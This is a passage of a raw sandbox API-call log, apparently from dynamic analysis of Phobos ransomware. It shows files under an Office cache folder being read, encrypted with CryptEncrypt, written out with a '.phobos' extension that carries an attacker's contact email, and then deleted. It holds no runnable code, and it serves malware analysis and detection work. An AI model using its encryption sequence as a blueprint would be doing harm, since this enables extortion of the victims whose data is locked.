hFile=0x184, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0158.175] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0158.175] WriteFile (in: hFile=0x184, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0158.273] CloseHandle (hObject=0x184) returned 1 [0158.584] SetEvent (hEvent=0xe8) returned 1 [0158.584] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0158.584] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0158.584] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=36233052) returned 1 [0158.584] CloseHandle (hObject=0x188) returned 1 [0158.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0158.584] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0158.585] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0158.585] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0158.585] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0158.585] ReadFile (in: hFile=0x188, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0158.688] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0158.688] ReadFile (in: hFile=0x188, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0159.194] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0159.194] ReadFile (in: hFile=0x188, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0159.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32da8) returned 1 [0159.256] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0159.256] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0159.264] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.264] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0159.264] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0159.277] SetEndOfFile (hFile=0x188) returned 1 [0159.277] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0159.278] WriteFile (in: hFile=0x188, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0159.279] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0159.279] WriteFile (in: hFile=0x188, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0159.280] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0159.280] WriteFile (in: hFile=0x188, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0159.281] CloseHandle (hObject=0x188) returned 1 [0159.281] SetEvent (hEvent=0xe8) returned 1 [0159.281] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0159.281] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0159.282] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=715834) returned 1 [0159.282] CloseHandle (hObject=0x188) returned 1 [0159.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0159.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.282] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0159.282] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0159.282] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0159.282] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0159.282] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0159.282] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0159.282] ReadFile (in: hFile=0x188, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xaec3a, lpOverlapped=0x0) returned 1 [0159.603] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xaec40, dwBufLen=0xaec40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xaec40) returned 1 [0159.610] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xaec40, lpOverlapped=0x0) returned 1 [0159.622] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32968) returned 1 [0159.622] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0159.622] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0159.622] CryptDestroyKey (hKey=0xa32968) returned 1 [0159.622] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0159.622] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.622] CloseHandle (hObject=0x188) returned 1 [0159.622] CloseHandle (hObject=0x17c) returned 1 [0159.622] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0159.629] SetEvent (hEvent=0xe8) returned 1 [0159.629] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0159.629] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.734] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=177720283) returned 1 [0159.734] CloseHandle (hObject=0x138) returned 1 [0159.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab")) returned 0x2020 [0159.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0159.735] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0159.735] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0159.735] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0159.735] ReadFile (in: hFile=0x138, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0159.992] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0159.992] ReadFile (in: hFile=0x138, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0160.027] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0160.027] ReadFile (in: hFile=0x138, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0160.042] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32da8) returned 1 [0160.042] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0160.043] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0160.051] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.051] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0160.051] WriteFile (in: hFile=0x138, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0160.069] SetEndOfFile (hFile=0x138) returned 1 [0160.190] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0160.190] WriteFile (in: hFile=0x138, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0160.192] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0160.192] WriteFile (in: hFile=0x138, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0160.193] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0160.193] WriteFile (in: hFile=0x138, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0160.193] CloseHandle (hObject=0x138) returned 1 [0160.193] SetEvent (hEvent=0xe8) returned 1 [0160.193] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0160.193] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0160.194] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1377656) returned 1 [0160.194] CloseHandle (hObject=0x138) returned 1 [0160.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0160.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.194] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0160.194] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0160.194] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0160.194] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.365] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ce8) returned 1 [0160.365] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0160.365] ReadFile (in: hFile=0x138, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x110100, lpOverlapped=0x0) returned 1 [0160.686] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100, dwBufLen=0x110100 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100) returned 1 [0160.694] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110100, lpOverlapped=0x0) returned 1 [0160.726] ReadFile (in: hFile=0x138, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x40478, lpOverlapped=0x0) returned 1 [0160.789] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40480, dwBufLen=0x40480 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40480) returned 1 [0160.791] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x40480, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x40480, lpOverlapped=0x0) returned 1 [0160.796] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0160.796] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0160.796] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0160.796] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.796] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0160.796] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.796] CloseHandle (hObject=0x138) returned 1 [0160.796] CloseHandle (hObject=0x130) returned 1 [0160.959] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0160.962] SetEvent (hEvent=0xe8) returned 1 [0160.963] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0160.963] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0161.024] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1992192) returned 1 [0161.024] CloseHandle (hObject=0x194) returned 1 [0161.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0161.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0161.027] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0161.027] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0161.027] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0161.027] ReadFile (in: hFile=0x194, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0161.070] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xa2200, 